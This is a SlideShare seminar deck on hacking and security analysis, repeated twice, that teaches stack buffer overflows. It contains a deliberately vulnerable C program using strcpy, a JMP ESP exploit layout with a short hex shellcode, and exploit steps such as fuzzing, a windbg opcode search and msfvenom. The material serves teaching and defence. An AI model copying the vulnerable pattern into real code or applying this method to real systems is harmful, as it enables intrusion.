SlideShare a Scribd company logo

Seminar Hacking & Security Analysis

Dan H, profile picture
Dan H

The document discusses hacking and information security analysis. It covers various hacking techniques like cyber spying, fraud/forgery, and illegal access. It then discusses common vulnerabilities like buffer overflows, SQL injections, and cross-site scripting attacks. The document provides examples of stack-based buffer overflows and how they can be exploited to hijack a program's execution flow and potentially execute arbitrary code. It also discusses mitigation techniques used by modern operating systems and counter-techniques employed by hackers.

Technology
1 of 37
Downloaded 174 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Hacking | Information Security Analysis Hacking Security Analysis -- Build security with creativity Danang Heriyadi (danang@hatsecure.com)
Hacking | Information Security Analysis Hello World
Hacking | Information Security Analysis Today Hacking Incidents Assets Vulnerability Analysis
Hacking | Information Security Analysis Top 3 - Hacking in action Cyber Spying Fraud or Forgery Illegal Access
Hacking | Information Security Analysis Cyber Spying
Hacking | Information Security Analysis Fraud or Forgery
Hacking | Information Security Analysis Illegal Access
Hacking | Information Security Analysis How they can do that? • Sensitive information disclosure – Search Engine (google, bing, yahoo) – Magazine – etc • Social engineering attacks – The knowledge and attitude members of an organization possess regarding the protection of the information assets. • Vulnerability on your system – Attacker exploit the vulnerability to gaining access.
Hacking | Information Security Analysis Google Hacking
Hacking | Information Security Analysis What are you trying to protect? • Senstive personal data • Your network infrastructure • Your assets
Hacking | Information Security Analysis Common Vulnerabilities • Web – XSS – Database Injection – OS command Injection – Local File Disclosure – File Inclusion – Path Disclosure – CSRF – Dir. Traversal • Low level Vulnerability – Stack Overflow – Heap Overflow – Integer Overflow – Memory Corruption – Etc
Hacking | Information Security Analysis Buffer Overflow • Low level vulnerability – Stack Overflow ( Very easy ) – Integer Overflow ( easy ) – Heap Overflow ( medium ) – Memory Corruption ( easy - medium ) – .....
Hacking | Information Security Analysis Impact of buffer overflow • Application – Crash and terminated – Arbitary code execution • Operating System – Crash, hang, or reboot – Arbitary code execution – Privilege escalation
Hacking | Information Security Analysis Basic Knowledge • CPU Register – EAX EDI – EBX ESI – ECX EBP – EDX ESP – EIP
Hacking | Information Security Analysis Basic Knowledge • Assembly Language – mov ret – push – pop – shr – jmp
Hacking | Information Security Analysis Windows Memory Allocation 0x00000000 0xFFFFFFFF Stack Heap Program Image • PE Header • .text, .rdata, .data, ... Can be allocated as heap or stack for other threads DLL PEB Shared User Page No Access 0x00400000 0x7FFE1000 0x7FFE0000 0x7FFDF000
Hacking | Information Security Analysis C++ from beginner #include <stdio.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; }
Hacking | Information Security Analysis Run it !!
Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } CPU Register (Example) • EIP = 0x01234567 => address of main() 0x00000000 Top of Stack
Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack CPU Register (Example) • EIP = 0x01234571 => address of vulnerable()
Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack CPU Register (Example) • EIP = 0x01234585 => stack_data[128]
Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack CPU Register (Example) • EIP = 0x01234544 => address of strcpy() <Space for stack_data> ESP <ptr to argv[1]> Saved EBP 0x00112233 Saved EIP 0x00112237
Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack ABCD ESP <ptr to argv[1]> Saved EBP 0x00112233 Saved EIP 0x00112237 CPU Register (Example) • EIP = 0x01234548 => address of printf()
Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack ESP <ptr to argv[1]> Saved EBP 0x00112233 Saved EIP 0x00112237 CPU Register (Example) • EIP = 0x01234552 => restore saved EIP -> EIP
Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack ESP <ptr to argv[1]> CPU Register (Example) • EIP = 0x01234599 => exit(0)
Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack
Hacking | Information Security Analysis Stack Allocation (Stack Overflow)
Hacking | Information Security Analysis Stack Allocation (Stack Overflow) #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack CPU Register (Example) • EIP = 0x012345 => address of strcpy() <Space for stack_data> ESP <ptr to argv[1]> Saved EBP 0x00112233 Saved EIP 0x00112237
Hacking | Information Security Analysis Stack Allocation (Stack Overflow) #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack 414141414141414141414141 414141414141414141414141 414141414141414141414141 Saved EBP 0x41414141 Saved EIP 0x41414141 ESP 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 0x00112233 0x00112237 CPU Register (Example) • EIP = 0x01234548 => address of printf()
Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack ESP 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 0x00112233 0x00112237 Saved EBP 0x41414141 Saved EIP 0x41414141 CPU Register (Example) • EIP = 0x41414141 => restore saved EIP -> EIP
Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack ESP 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 0x00112233 0x00112237 CPU Register (Example) • EIP = 0x41414141 Access Volation when executing 0x41414141
Hacking | Information Security Analysis Stack Exploitation
Hacking | Information Security Analysis Stack Exploitation (Stack Overflow) 0x00000000 Top of Stack 414141414141414141414141 414141414141414141414141 414141414141414141414141 Saved EBP 0x41414141 Saved EIP 0x41414141 ESP 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 0x00112233 0x00112237 0x00000000 Top of Stack 414141414141414141414141 414141414141414141414141 414141414141414141414141 Saved EBP 0x41414141 Saved EIP 0x80221122 ESP 31c031db31c931d2eb16bfea 07457e50535150ffd75950684 141414189e3ebeae8f0ffffff48 656c6c6f776f726c64 0x00112233 0x00112237 Shellcode Address for JMP ESP
Hacking | Information Security Analysis Shellcode • Small piece of code used as the payload in the exploitation of a software vulnerability • Why is our shellcode not working? – bad character – Big size
Hacking | Information Security Analysis • Fuzzing Technique – Detecting Buffer Overflow – Find offset to overwrite EBP and EIP register • Find -> JMP ESP windbg command > lm muser32 windbg command > s -b 7xxxxx 7xxxxx ff e4 • Generate shellcode – msfvenom – manual :-P • Finishing Exploit Stack Exploitation (Stack Overflow)
Hacking | Information Security Analysis Mitigation and Technique • Windows XP – Hardware DEP -> ROP shellcode • Windows Vistra – ASLR -> Static address on shared data memory – DEP -> ROP shellcode • Windows 7 – ASLR + DEP -> ROP / JIT ROP / JIT ROP Spraying
Hacking | Information Security Analysis Mitigation and Technique • Windows 8 – ASLR + DEP (new) -> ROP / JIT ROP

More Related Content

PDF
Hollywood mode off: security testing at scale
Claudio Criscione
 
PDF
Franta Polach - Exploring Patent Data with Python
PyData
 
PPTX
Ember
mrphilroth
 
PPTX
Solr 6 Feature Preview
Yonik Seeley
 
PDF
Solr vs. Elasticsearch, Case by Case: Presented by Alexandre Rafalovitch, UN
Lucidworks
 
PDF
Magic Clusters and Where to Find Them 2.0 - Eugene Pirogov
Elixir Club
 
PDF
Python build your security tools.pdf
TECHNOLOGY CONTROL CO.
 
PDF
Workshop 101 - Penetration testing & Vulnerability assessment system
Dan H
 
Hollywood mode off: security testing at scale
Claudio Criscione
 
Franta Polach - Exploring Patent Data with Python
PyData
 
Ember
mrphilroth
 
Solr 6 Feature Preview
Yonik Seeley
 
Solr vs. Elasticsearch, Case by Case: Presented by Alexandre Rafalovitch, UN
Lucidworks
 
Magic Clusters and Where to Find Them 2.0 - Eugene Pirogov
Elixir Club
 
Python build your security tools.pdf
TECHNOLOGY CONTROL CO.
 
Workshop 101 - Penetration testing & Vulnerability assessment system
Dan H
 

Viewers also liked (20)

PDF
Linux Exploit Research
Dan H
 
PDF
Backtrack 5 - network pentest
Dan H
 
PDF
Backtrack 5 - web pentest
Dan H
 
PDF
Web Hacking (basic)
Ammar WK
 
PDF
backdooring workshop
Ammar WK
 
PDF
Ethical hacking
Khairi Aiman
 
PDF
Advanced Exploit Development (Updated on 28 January, 2016)
Dan H
 
PDF
Advanced exploit development
Dan H
 
PPT
Penetrasi Jaringan
Digital Echidna
 
PDF
Mastering Network HackingFU - idsecconf2008
Ammar WK
 
PDF
Had sec mikrotik administrator
muhammad pailus
 
PDF
Syllabus Advanced Exploit Development 22-23 June 2013
Dan H
 
PDF
Workshop 101 - Penetration testing & Vulnerability Assessment
Dan H
 
PDF
Mobile hacking, pentest, and malware
Ammar WK
 
PPTX
Pentesting with linux
Hammad Ahmed Khawaja
 
PDF
IPTV Security
M.Syarifudin, ST, OSCP, OSWP
 
PDF
password series
Ammar WK
 
PDF
Social Network Security & Backdooring email
M.Syarifudin, ST, OSCP, OSWP
 
PDF
iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP
 
PDF
Information gath
M.Syarifudin, ST, OSCP, OSWP
 
Linux Exploit Research
Dan H
 
Backtrack 5 - network pentest
Dan H
 
Backtrack 5 - web pentest
Dan H
 
Web Hacking (basic)
Ammar WK
 
backdooring workshop
Ammar WK
 
Ethical hacking
Khairi Aiman
 
Advanced Exploit Development (Updated on 28 January, 2016)
Dan H
 
Advanced exploit development
Dan H
 
Penetrasi Jaringan
Digital Echidna
 
Mastering Network HackingFU - idsecconf2008
Ammar WK
 
Had sec mikrotik administrator
muhammad pailus
 
Syllabus Advanced Exploit Development 22-23 June 2013
Dan H
 
Workshop 101 - Penetration testing & Vulnerability Assessment
Dan H
 
Mobile hacking, pentest, and malware
Ammar WK
 
Pentesting with linux
Hammad Ahmed Khawaja
 
IPTV Security
M.Syarifudin, ST, OSCP, OSWP
 
password series
Ammar WK
 
Social Network Security & Backdooring email
M.Syarifudin, ST, OSCP, OSWP
 
iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP
 
Information gath
M.Syarifudin, ST, OSCP, OSWP
 

Similar to Seminar Hacking & Security Analysis (20)

PDF
Automating Analysis and Exploitation of Embedded Device Firmware
Malachi Jones
 
PPT
Buffer Overflows
Sumit Kumar
 
PDF
basicsCC++1.pdf in Pakistan and its parts
ADNANSHAIKH113348
 
PDF
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
Code Engn
 
PDF
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
Teddy Hsiung
 
PDF
[ENG] Hacktivity 2013 - Alice in eXploitland
Zoltan Balazs
 
ODP
BufferOverflow - Offensive point of View
Toe Khaing
 
PPTX
Go Native : Squeeze the juice out of your 64-bit processor using C++
Fernando Moreira
 
PDF
Secure .NET programming
Ante Gulam
 
PPTX
C Programming Training in Ambala ! Batra Computer Centre
jatin batra
 
PDF
2.Format Strings
phanleson
 
PPTX
data_structure (1).pptx
nascramaprabhacs1
 
PPT
0x4841434b45525a – H4x0r presentation for n00bs
Gil Megidish
 
PPTX
System Calls.pptxnsjsnssbhsbbebdbdbshshsbshsbbs
ashukiller7
 
PPT
Cloud Observation and Performance Analysis using Solaris 11 DTrace
Orgad Kimchi
 
PPT
Hack in the Box Keynote 2006
Mark Curphey
 
PPTX
antoanthongtin_Lesson 3- Software Security (1).pptx
23162024
 
PPTX
PenTest using Python By Purna Chander
nforceit
 
DOC
C - aptitude3
Srikanth
 
DOC
C aptitude questions
Srikanth
 
Automating Analysis and Exploitation of Embedded Device Firmware
Malachi Jones
 
Buffer Overflows
Sumit Kumar
 
basicsCC++1.pdf in Pakistan and its parts
ADNANSHAIKH113348
 
[2007 CodeEngn Conference 01] seaofglass - Linux Virus Analysis
Code Engn
 
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
Teddy Hsiung
 
[ENG] Hacktivity 2013 - Alice in eXploitland
Zoltan Balazs
 
BufferOverflow - Offensive point of View
Toe Khaing
 
Go Native : Squeeze the juice out of your 64-bit processor using C++
Fernando Moreira
 
Secure .NET programming
Ante Gulam
 
C Programming Training in Ambala ! Batra Computer Centre
jatin batra
 
2.Format Strings
phanleson
 
data_structure (1).pptx
nascramaprabhacs1
 
0x4841434b45525a – H4x0r presentation for n00bs
Gil Megidish
 
System Calls.pptxnsjsnssbhsbbebdbdbshshsbshsbbs
ashukiller7
 
Cloud Observation and Performance Analysis using Solaris 11 DTrace
Orgad Kimchi
 
Hack in the Box Keynote 2006
Mark Curphey
 
antoanthongtin_Lesson 3- Software Security (1).pptx
23162024
 
PenTest using Python By Purna Chander
nforceit
 
C - aptitude3
Srikanth
 
C aptitude questions
Srikanth
 

Recently uploaded (20)

PDF
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
PDF
Doc9.....................................
SofiaCollazos
 
PPTX
The Future of AI & Machine Learning.pptx
pritsen4700
 
PPTX
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
PDF
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
PDF
Get More from Fiori Automation - What’s New, What Works, and What’s Next.pdf
Precisely
 
PDF
GDG Cloud Munich - Intro - Luiz Carneiro - #BuildWithAI - July - Abdel.pdf
Luiz Carneiro
 
PDF
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
PDF
Orbitly Pitch Deck|A Mission-Driven Platform for Side Project Collaboration (...
zz41354899
 
PPTX
Agile Chennai 18-19 July 2025 Ideathon | AI Powered Microfinance Literacy Gui...
AgileNetwork
 
PDF
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
PDF
Brief History of Internet - Early Days of Internet
sutharharshit158
 
PPTX
cloud computing vai.pptx for the project
vaibhavdobariyal79
 
PDF
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
PDF
The Future of Mobile Is Context-Aware—Are You Ready?
iProgrammer Solutions Private Limited
 
PPTX
Introduction to Flutter by Ayush Desai.pptx
ayushdesai204
 
PDF
Accelerating Oracle Database 23ai Troubleshooting with Oracle AHF Fleet Insig...
Sandesh Rao
 
PDF
MASTERDECK GRAPHSUMMIT SYDNEY (Public).pdf
Neo4j
 
PDF
AI Unleashed - Shaping the Future -Starting Today - AIOUG Yatra 2025 - For Co...
Sandesh Rao
 
PDF
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
Doc9.....................................
SofiaCollazos
 
The Future of AI & Machine Learning.pptx
pritsen4700
 
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
Get More from Fiori Automation - What’s New, What Works, and What’s Next.pdf
Precisely
 
GDG Cloud Munich - Intro - Luiz Carneiro - #BuildWithAI - July - Abdel.pdf
Luiz Carneiro
 
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
Orbitly Pitch Deck|A Mission-Driven Platform for Side Project Collaboration (...
zz41354899
 
Agile Chennai 18-19 July 2025 Ideathon | AI Powered Microfinance Literacy Gui...
AgileNetwork
 
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
Brief History of Internet - Early Days of Internet
sutharharshit158
 
cloud computing vai.pptx for the project
vaibhavdobariyal79
 
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
The Future of Mobile Is Context-Aware—Are You Ready?
iProgrammer Solutions Private Limited
 
Introduction to Flutter by Ayush Desai.pptx
ayushdesai204
 
Accelerating Oracle Database 23ai Troubleshooting with Oracle AHF Fleet Insig...
Sandesh Rao
 
MASTERDECK GRAPHSUMMIT SYDNEY (Public).pdf
Neo4j
 
AI Unleashed - Shaping the Future -Starting Today - AIOUG Yatra 2025 - For Co...
Sandesh Rao
 
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 

Seminar Hacking & Security Analysis

  • 1. Hacking | Information Security Analysis Hacking Security Analysis -- Build security with creativity Danang Heriyadi ([email protected])
  • 2. Hacking | Information Security Analysis Hello World
  • 3. Hacking | Information Security Analysis Today Hacking Incidents Assets Vulnerability Analysis
  • 4. Hacking | Information Security Analysis Top 3 - Hacking in action Cyber Spying Fraud or Forgery Illegal Access
  • 5. Hacking | Information Security Analysis Cyber Spying
  • 6. Hacking | Information Security Analysis Fraud or Forgery
  • 7. Hacking | Information Security Analysis Illegal Access
  • 8. Hacking | Information Security Analysis How they can do that? • Sensitive information disclosure – Search Engine (google, bing, yahoo) – Magazine – etc • Social engineering attacks – The knowledge and attitude members of an organization possess regarding the protection of the information assets. • Vulnerability on your system – Attacker exploit the vulnerability to gaining access.
  • 9. Hacking | Information Security Analysis Google Hacking
  • 10. Hacking | Information Security Analysis What are you trying to protect? • Senstive personal data • Your network infrastructure • Your assets
  • 11. Hacking | Information Security Analysis Common Vulnerabilities • Web – XSS – Database Injection – OS command Injection – Local File Disclosure – File Inclusion – Path Disclosure – CSRF – Dir. Traversal • Low level Vulnerability – Stack Overflow – Heap Overflow – Integer Overflow – Memory Corruption – Etc
  • 12. Hacking | Information Security Analysis Buffer Overflow • Low level vulnerability – Stack Overflow ( Very easy ) – Integer Overflow ( easy ) – Heap Overflow ( medium ) – Memory Corruption ( easy - medium ) – .....
  • 13. Hacking | Information Security Analysis Impact of buffer overflow • Application – Crash and terminated – Arbitary code execution • Operating System – Crash, hang, or reboot – Arbitary code execution – Privilege escalation
  • 14. Hacking | Information Security Analysis Basic Knowledge • CPU Register – EAX EDI – EBX ESI – ECX EBP – EDX ESP – EIP
  • 15. Hacking | Information Security Analysis Basic Knowledge • Assembly Language – mov ret – push – pop – shr – jmp
  • 16. Hacking | Information Security Analysis Windows Memory Allocation 0x00000000 0xFFFFFFFF Stack Heap Program Image • PE Header • .text, .rdata, .data, ... Can be allocated as heap or stack for other threads DLL PEB Shared User Page No Access 0x00400000 0x7FFE1000 0x7FFE0000 0x7FFDF000
  • 17. Hacking | Information Security Analysis C++ from beginner #include <stdio.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; }
  • 18. Hacking | Information Security Analysis Run it !!
  • 19. Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } CPU Register (Example) • EIP = 0x01234567 => address of main() 0x00000000 Top of Stack
  • 20. Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack CPU Register (Example) • EIP = 0x01234571 => address of vulnerable()
  • 21. Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack CPU Register (Example) • EIP = 0x01234585 => stack_data[128]
  • 22. Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack CPU Register (Example) • EIP = 0x01234544 => address of strcpy() <Space for stack_data> ESP <ptr to argv[1]> Saved EBP 0x00112233 Saved EIP 0x00112237
  • 23. Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack ABCD ESP <ptr to argv[1]> Saved EBP 0x00112233 Saved EIP 0x00112237 CPU Register (Example) • EIP = 0x01234548 => address of printf()
  • 24. Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack ESP <ptr to argv[1]> Saved EBP 0x00112233 Saved EIP 0x00112237 CPU Register (Example) • EIP = 0x01234552 => restore saved EIP -> EIP
  • 25. Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack ESP <ptr to argv[1]> CPU Register (Example) • EIP = 0x01234599 => exit(0)
  • 26. Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack
  • 27. Hacking | Information Security Analysis Stack Allocation (Stack Overflow)
  • 28. Hacking | Information Security Analysis Stack Allocation (Stack Overflow) #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack CPU Register (Example) • EIP = 0x012345 => address of strcpy() <Space for stack_data> ESP <ptr to argv[1]> Saved EBP 0x00112233 Saved EIP 0x00112237
  • 29. Hacking | Information Security Analysis Stack Allocation (Stack Overflow) #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack 414141414141414141414141 414141414141414141414141 414141414141414141414141 Saved EBP 0x41414141 Saved EIP 0x41414141 ESP 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 0x00112233 0x00112237 CPU Register (Example) • EIP = 0x01234548 => address of printf()
  • 30. Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack ESP 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 0x00112233 0x00112237 Saved EBP 0x41414141 Saved EIP 0x41414141 CPU Register (Example) • EIP = 0x41414141 => restore saved EIP -> EIP
  • 31. Hacking | Information Security Analysis Stack Allocation #include <stdio.h> #include <string.h> void vulnerable(char *Buffer){ char stack_data[128]; strcpy (stack_data, Buffer); printf( " Isi variabel stack_data : %s ", stack_data); } int main(int argc, char **argv){ vulnerable(argv[1]); return 0; } 0x00000000 Top of Stack ESP 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 0x00112233 0x00112237 CPU Register (Example) • EIP = 0x41414141 Access Volation when executing 0x41414141
  • 32. Hacking | Information Security Analysis Stack Exploitation
  • 33. Hacking | Information Security Analysis Stack Exploitation (Stack Overflow) 0x00000000 Top of Stack 414141414141414141414141 414141414141414141414141 414141414141414141414141 Saved EBP 0x41414141 Saved EIP 0x41414141 ESP 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 414141414141414141414141 0x00112233 0x00112237 0x00000000 Top of Stack 414141414141414141414141 414141414141414141414141 414141414141414141414141 Saved EBP 0x41414141 Saved EIP 0x80221122 ESP 31c031db31c931d2eb16bfea 07457e50535150ffd75950684 141414189e3ebeae8f0ffffff48 656c6c6f776f726c64 0x00112233 0x00112237 Shellcode Address for JMP ESP
  • 34. Hacking | Information Security Analysis Shellcode • Small piece of code used as the payload in the exploitation of a software vulnerability • Why is our shellcode not working? – bad character – Big size
  • 35. Hacking | Information Security Analysis • Fuzzing Technique – Detecting Buffer Overflow – Find offset to overwrite EBP and EIP register • Find -> JMP ESP windbg command > lm muser32 windbg command > s -b 7xxxxx 7xxxxx ff e4 • Generate shellcode – msfvenom – manual :-P • Finishing Exploit Stack Exploitation (Stack Overflow)
  • 36. Hacking | Information Security Analysis Mitigation and Technique • Windows XP – Hardware DEP -> ROP shellcode • Windows Vistra – ASLR -> Static address on shared data memory – DEP -> ROP shellcode • Windows 7 – ASLR + DEP -> ROP / JIT ROP / JIT ROP Spraying
  • 37. Hacking | Information Security Analysis Mitigation and Technique • Windows 8 – ASLR + DEP (new) -> ROP / JIT ROP